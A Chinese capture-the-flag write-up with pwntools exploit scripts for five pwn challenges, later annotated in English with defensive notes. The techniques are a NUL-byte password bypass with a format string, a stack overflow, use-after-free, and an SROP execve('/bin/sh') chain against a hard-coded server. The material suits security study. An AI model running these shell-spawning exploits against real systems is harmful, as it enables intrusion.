水、水、水。

bank

password是随机的密码,有一定几率第一个字节是\x00,我们也输入\x00就可以进去,然后通过格式化字符串漏洞读取。
这里你可以先patch文件使其通过判断,然后看下格式化字符串怎么构造。

# -*- coding: utf-8 -*
from pwn import *
from ctypes import *

# pwntools setup: log every byte sent/received and treat the target as
# 64-bit.
context.log_level = 'debug'
context.arch = 'amd64'
# NOTE(review): `elf` is never referenced in this script.
elf = ELF('bank2')
# Module-level connection handle; pwn() rebinds it to a process/remote.
p = 0
def pwn(ip,port,debug):
    """Run one attempt against the ``bank2`` service.

    ip, port: remote endpoint, used when ``debug`` is not 1.
    debug:    1 starts ``./bank2`` locally instead of connecting remotely.

    The connection is kept in the module-level ``p`` so the ``except``
    branch can close it; the caller is expected to call again.
    """
    global p
    if(debug == 1):
        p = process('./bank2')

    else:
        p = remote(ip,port)
    #gdb.attach(p,"b *0x4014F5")
    # Account and password are both answered with 0x30 NUL bytes. Per the
    # write-up, the service's random password sometimes begins with \x00;
    # presumably the check is a C-string comparison that stops at the first
    # NUL, so an all-NUL input matches in that case. (The defensive fix is a
    # length-checked, constant-time comparison of the full secret.)
    p.sendlineafter("your account:\n","\x00"*0x30)
    # sendafter, not sendlineafter: the newline is part of the payload.
    payload = "\x00"*0x30+"\n"
    p.sendafter("your password:\n",payload)
    try:
        # If the bypass failed the "balance?" prompt presumably never arrives,
        # the recv raises (EOF/timeout) and control goes to the except branch.
        p.sendlineafter("balance?\n","yes")
        # "%8$s" is a positional printf directive (8th vararg printed as a C
        # string). Per the write-up the "code" is used as a format string —
        # the root cause; printf("%s", buf) instead of printf(buf) avoids it.
        payload = "%8$s"
        p.sendlineafter("code: \n",payload)
        print p.recvline()
        pause()
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt, so a
        # Ctrl-C here only closes this connection instead of stopping the run.
        p.close()
if __name__ == '__main__':
    # Retry without limit: per the write-up the bypass only works when the
    # service's random password happens to start with \x00, and pwn() closes
    # the connection on each failed attempt.
    # NOTE(review): there is no exit condition; the loop runs until killed.
    while(1):
        pwn('81.70.195.166',10000,0)

auto

angr,兄弟们直接冲了,我的垃圾机子直接跑死,还得是好兄弟的高贵的MAC,一下子就尼玛跑起来了,真牛皮。

# -*- coding: utf-8 -*
from angr import *


# Load only the `auto` binary (no shared libraries) and start symbolic
# execution from its entry point.
p = Project("auto",auto_load_libs=False)

state=p.factory.entry_state()

sm=p.factory.simulation_manager(state)

# Explore until some state reaches 0x80486C5, pruning any state that reaches
# 0x804875E. Which code paths these addresses are (presumably the accept and
# reject branches) comes from the author's analysis, not shown on the page.
res=sm.explore(find=0x80486C5 ,avoid=0x804875E)

print len(res.found)
for pp in res.found:
    # Concretised stdin (fd 0) of each found state, i.e. an input that
    # reaches the find address. The write-up reports UXYUKVNZ.
    print pp.posix.dumps(0)

跑出来密码就是UXYUKVNZ
里面是个栈溢出,不解释直接淦

# -*- coding: utf-8 -*
from pwn import *
# pwntools setup: verbose I/O logging, 64-bit default packing.
# NOTE(review): the addresses used below (0x0804xxxx) and the explicit p32
# suggest a 32-bit binary; p32 makes the arch setting irrelevant here.
context.log_level = 'debug'
context.arch = 'amd64'
# NOTE(review): `elf` is never referenced in this script.
elf = ELF('auto')
# Module-level connection handle; pwn() rebinds it.
p = 0
def pwn(ip,port,debug):
    """Drive the ``auto`` service: send the recovered password, then the overflow.

    ip, port: remote endpoint, used when ``debug`` is not 1.
    debug:    1 runs ``./auto`` locally instead.
    """
    global p
    if(debug == 1):
        p = process('./auto')

    else:
        p = remote(ip,port)
    #gdb.attach(p,"b *0x8048721")
    # Password recovered with angr (see the write-up above).
    p.sendlineafter("the password: \n","UXYUKVNZ")
    # 76 bytes of filler ("deadbeef" + 68 x "x") followed by a little-endian
    # 32-bit address. The write-up calls this a stack overflow, so the address
    # presumably replaces the saved return address; what lives at 0x8048665
    # is not stated on the page. A bounds-checked read of the second password
    # would close the overflow.
    p.sendlineafter("password again: \n","deadbeef"+"x"*68+p32(0x8048665))
    p.interactive()
if __name__ == '__main__':
    # Single remote run (debug=0).
    pwn('81.70.195.166',10001,0)

paper

UAF,一个选项直接泄露stack地址,一个选项可以改栈上8字节,直接八字节伪造stack的heap头,然后uaf直接冲。

# -*- coding: utf-8 -*
from pwn import *
# pwntools setup: verbose I/O logging, 64-bit target.
context.log_level = 'debug'
context.arch = 'amd64'
# NOTE(review): `elf` is never referenced in this script.
elf = ELF('paper')
# Module-level connection handle; pwn() rebinds it.
p = 0
def pwn(ip,port,debug):
    """Drive the ``paper`` menu service: stack-address leak, then use-after-free.

    ip, port: remote endpoint, used when ``debug`` is not 1.
    debug:    1 runs ``./paper`` locally instead.
    """
    global p
    if(debug == 1):
        p = process('./paper')

    else:
        p = remote(ip,port)
    # Menu wrappers: each picks an option at the "choice > " prompt and
    # answers its follow-up prompts. Numbers are sent as decimal text.
    def add():
        p.sendlineafter("choice > ","1")
    def free(index):
        p.sendlineafter("choice > ","2")
        p.sendlineafter("Index:\n",str(index))
    def write(index,num):
        p.sendlineafter("choice > ","3")
        p.sendlineafter("Index:\n",str(index))
        p.sendlineafter("word count:\n",str(num))
    def show():
        p.sendlineafter("choice > ","4")
    def disk(num):
        p.sendlineafter("choice > ","5")
        p.sendlineafter("Which disk?\n",str(num))
    def back():
        p.sendlineafter("choice > ","6")
    # Option 4 prints a stack address (the write-up: one option leaks a
    # stack address); take the 12 hex digits following "0x".
    show()
    p.recvuntil("0x")
    stack_addr = int(p.recv(12),16)
    print "stack_addr = ",hex(stack_addr)
    # Option 5 stores 8 bytes on the stack; 0x21 is presumably the forged
    # chunk header the write-up mentions.
    disk(0x21)
    show()
    # NOTE(review): backaddr is computed but never used.
    backaddr = stack_addr +8
    # Allocate, free, then write through the now-freed index 0 (the
    # use-after-free named in the write-up). Defensively: clear the slot on
    # free and reject operations on freed entries.
    add()
    free(0)
    write(0,stack_addr-8)
    add()
    add()
    write(2,0xCCCCCCCC)
    #gdb.attach(p,"b *$rebase(0xD23)")
    back()
    p.interactive()
if __name__ == '__main__':
    # Single remote run (debug=0).
    pwn('81.70.195.166',10003,0)

SMALL

SROP,我他妈直接冲

# -*- coding: utf-8 -*
from pwn import *
# pwntools setup: verbose I/O logging; amd64 also selects the register layout
# SigreturnFrame() uses in pwn().
context.log_level = 'debug'
context.arch = 'amd64'
# NOTE(review): `elf` is never referenced in this script.
elf = ELF('small')
# Module-level connection handle; pwn() rebinds it.
p = 0
def pwn(ip,port,debug):
    """Drive the ``small`` service with two sigreturn frames (SROP, per the write-up).

    ip, port: remote endpoint, used when ``debug`` is not 1.
    debug:    1 runs ``./small`` locally instead.

    The gadget addresses (0x40100D, 0x40102B) and the scratch address
    0x402500 come from the author's analysis of the binary, which the page
    does not show; nothing below is verified against a disassembly.
    """
    global p
    if(debug == 1):
        p = process('./small')

    else:
        p = remote(ip,port)

    # First frame. The register values match the x86-64 read(0, buf, len)
    # convention (rax=0, rdi=0, rsi=buffer, rdx=length); rsp/rbp are both
    # pointed at the same 0x402500 buffer and rip at the 0x40102B gadget.
    frame = SigreturnFrame()
    frame.rax = 0
    frame.rdi = 0
    frame.rsi = 0x0402500
    frame.rdx = 0x300
    frame.rip = 0x40102B
    frame.rsp = 0x0402500
    frame.rbp = 0x0402500
    # 0x18 bytes of filler, two gadget addresses, then the serialised frame.
    p.send("a"*0x18+p64(0x40100D)+p64(0x40102B)+str(frame))

    # 14 bytes plus the newline — presumably sized so a read()'s byte count
    # ends up as the syscall number (15 is rt_sigreturn on x86-64).
    p.sendline("a"*14)


    # Second frame. rax=59 is the x86-64 execve syscall number; rdi is the
    # same scratch buffer. What that buffer holds when it runs is not
    # traceable from the page.
    frame = SigreturnFrame()
    frame.rax = 59
    frame.rdi = 0x0402500
    frame.rsi = 0
    frame.rdx = 0
    frame.rip = 0x40102B

    p.sendline("\x00"*8+p64(0x040100D)+p64(0x40102B)+str(frame))

    # Final input: 8 filler bytes followed by the "/bin/sh" string.
    p.send("a"*8+"/bin/sh")


    p.interactive()
if __name__ == '__main__':
    # Single remote run (debug=0).
    pwn("81.70.195.166", 10002,0)

managebooks

libc2.27的uaf,申请0x500大内存,在modify的时候free掉就会出现libc地址,再用see打印出来,然后利用UAF覆盖see的指针就可以。

# -*- coding: utf-8 -*
from pwn import *
# pwntools setup: verbose I/O logging, 64-bit target.
context.log_level = 'debug'
context.arch = 'amd64'
# NOTE(review): `elf` is never referenced in this script (the libc ELF loaded
# inside pwn() is the one actually used).
elf = ELF('managebooks')
# Module-level connection handle; pwn() rebinds it.
p = 0
def pwn(ip,port,debug):
    """Drive the ``managebooks`` menu: libc leak via a freed 0x500 summary, then UAF.

    ip, port: remote endpoint, used when ``debug`` is not 1.
    debug:    1 runs ``./managebooks`` locally instead.
    """
    global p
    if(debug == 1):
        p = process('./managebooks')

    else:
        p = remote(ip,port)


    # Menu wrappers. Each picks an option at the ">> " prompt and answers its
    # follow-up prompts; sizes and IDs are sent as decimal text.
    def creates(s,n,ss,su):
        # Option 1: a name of size s and a summary of size ss.
        p.sendlineafter(">> ","1")
        p.sendlineafter("size: ",str(s))
        p.sendlineafter("name: ",n)
        p.sendlineafter("size: ",str(ss))
        p.sendlineafter("summary: ",su)
    def delete(i):
        p.sendlineafter(">> ","2")
        p.sendlineafter("ID (0-10): ",str(i))
    def modify(i,ss,su):
        # Option 3; the summary goes out with sendafter, so no newline is
        # appended to it.
        p.sendlineafter(">> ","3")
        p.sendlineafter(": ",str(i))
        p.sendlineafter("size: ",str(ss))
        p.sendafter("summary: ",su)
    def see(i):
        p.sendlineafter(">> ","4")
        p.sendlineafter("ID (0-10): ",str(i))

    #gdb.attach(p,"b *0x400DC5")
    # Three books: the first with a 0x500-byte summary, the others 0x80.
    creates(0x10,"/bin/sh\x00",0x500,"/bin/sh\x00")#0
    creates(0x10,"/bin/sh\x00",0x80,"/bin/sh\x00")#1
    creates(0x10,"/bin/sh\x00",0x80,"/bin/sh\x00")#2
    #-----show
    # Per the write-up, modify frees the 0x500 summary and a libc pointer is
    # left in it. Only a single byte (\x61) is written, so presumably the low
    # byte of that pointer becomes 0x61 (matched by the 0x3ec061 offset below).
    modify(0,0x30,"\x61")
    see(0)
    # Take 6 bytes of the printed pointer and zero-extend to 8.
    addr = u64(p.recv(6).ljust(8,"\x00"))
    # Local copy of the target's libc, used for the system() symbol offset.
    libc = ELF("libc.so.6")

    delete(1)
    # ----
    # New book whose name is the address of system(). 0x3ec061 is a
    # hard-coded distance from the leaked value to the libc base, so it is
    # specific to the libc build the author used (2.27 per the write-up).
    creates(0x10,p64(addr-0x3ec061 + libc.symbols["system"]),0x10,"/bin/sh\x00")

    # Per the write-up, see's pointer for the deleted ID 1 is still live and
    # now overwritten (use-after-free). Defensively: clear the slot on delete
    # and refuse to show freed entries.
    see(1)


    p.interactive()
if __name__ == '__main__':
    # Single remote run (debug=0).
    pwn('81.70.195.166',10004,0)

总结

难度还是比较简单的,水文章本身没什么收获。